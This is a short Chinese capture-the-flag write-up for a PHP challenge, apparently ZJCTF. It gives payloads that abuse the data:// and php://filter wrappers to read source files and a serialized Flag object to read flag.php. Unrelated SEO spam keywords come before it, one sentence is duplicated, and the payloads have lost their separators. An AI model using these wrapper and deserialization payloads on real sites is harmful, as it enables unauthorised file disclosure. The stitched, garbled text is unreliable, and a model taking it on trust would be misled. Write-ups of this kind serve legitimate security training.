黄页引流推广网站入口,路由器做网站主机要备案吗,天津建设工程信息,网站建设找哪里虽然有include函数但我们无法直接包含flag因为对file进行了过滤#xff0c;又看见有反序列化的入口#xff0c;只是并没有发现可利用的方法#xff0c;但题目有提示所以尝试将其调出来
php伪协议写入内容
看到file_get_contents函数想到使用data协议#xff0c;去封装一个…虽然有include函数但我们无法直接包含flag因为对file进行了过滤又看见有反序列化的入口只是并没有发现可利用的方法但题目有提示所以尝试将其调出来
php伪协议写入内容
看到file_get_contents函数想到使用data协议去封装一个流然后保险起见include使用了filterdata写入内容为welcome to the zjctf加入php伪协议来读取useless.php
payload如下
?textdata://text/plain,welcome to the zjctffilephp://filter/convert.base64-encode/resourceuseless.php 给file变量在赋值读取flag.php
O:4:Flag:1:{s:4:file;s:8:flag.php;}
将前面的伪协议去掉最终的poc是
/?textdata://text/plain,welcome to the zjctffileuseless.phppasswordO:4:Flag:1:{s:4:file;s:8:flag.php;}
